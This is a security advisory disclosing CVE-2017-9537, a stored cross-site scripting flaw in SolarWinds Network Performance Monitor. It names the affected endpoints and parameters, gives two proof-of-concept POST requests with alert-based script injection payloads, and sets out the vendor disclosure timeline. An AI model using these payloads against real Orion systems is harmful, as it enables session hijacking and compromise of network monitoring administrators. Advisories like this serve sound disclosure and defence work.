------------------------------------------------------------- Vulnerability type: Persistent Cross-Site Scripting ------------------------------------------------------------- Credit: Andy Tan CVE ID: CVE-2017-9537 ----------------------------------------------- Product: SolarWinds Network Performance Monitor ----------------------------------------------- Affected version: SolarWinds Network Performance Monitor version 12.0.15300.90 and possibly earlier Hotfix: SolarWinds Orion Platform 2017.3 Hotfix 1 1. Affected URL: https://<ip>/Orion/Nodes/Add/Properties.aspx Affected parameter: City, Comments, Department Affected functions: Group Description field, Last_XX_Events resource, Events page, and error page Navigation: (Settings -> Manage Nodes -> Add Node) 2. Affected Source URL: https://<ip>/Orion/Services/WebAdmin.asmx/CreateExternalWebsite Affected parameter: FullTitle Affected URL: https://<ip>/Orion/External.aspx?Site=<no> Navigation: (Settings -> All Settings -> External Websites) ================ Proof of Concept ================ 1. POST /Orion/Nodes/Add/Properties.aspx HTTP/1.1 <Fill up rest of the headers> <Fill up rest of the parameters>ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ctl06%24repCustomProperties%24ctl00%24PropertyValue%24TextBoxEditorValue=%3CIMG%20SRC%3D%20a%20onerror%3Dalert('testXSSCity')%3E&ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ctl06%24repCustomProperties%24ctl01%24PropertyValue%24TextBoxEditorValue=%3CIMG%20SRC%3D%20a%20onerror%3Dalert('testXSSComments')%3E&ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ctl06%24repCustomProperties%24ctl02%24PropertyValue%24TextBoxEditorValue=%3CIMG%20SRC%3D%20a%20onerror%3Dalert('testXSSDept')%3E 2. POST /Orion/Services/WebAdmin.asmx/CreateExternalWebsite HTTP/1.1 <Fill up rest of the headers> {"site":{"ID":0,"ShortTitle":"title","FullTitle":"</title><script>alert('DTPTXSS!')</script>","URL":"url"},"menuBar":"Default"} ------------------------ Vendor contact timeline: ------------------------ 2017-06-12: Contacted vendor. 2017-06-23: Vendor responded that bug jury completed and vulnerability is assigned to vNext milestone. 2017-08-22: Contacted vendor again. 2017-08-23: Vendor responded that hotfix will be released for all products shipping on Orion Core 2017.3 2017-09-28: Contacted vendor again. 2017-09-28: Vendor responded that the vulnerability is addressed in the recently released Hotfix for Core 2017.3 2017-09-29: Public disclosure.